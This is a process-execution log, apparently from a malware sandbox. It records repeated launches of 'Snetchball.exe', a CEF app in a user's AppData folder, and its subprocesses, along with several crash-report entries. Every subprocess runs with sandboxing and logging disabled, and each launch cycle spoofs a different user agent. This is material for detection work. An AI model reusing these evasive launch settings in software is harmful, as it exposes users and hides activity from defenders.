"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3048 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3052 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4224 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1328

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1084

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2864 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3132 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3220 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3212 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4276 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2872 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4316 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2896 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2932 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2928 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3172 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4004 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2796 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2948 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2980 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3128 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

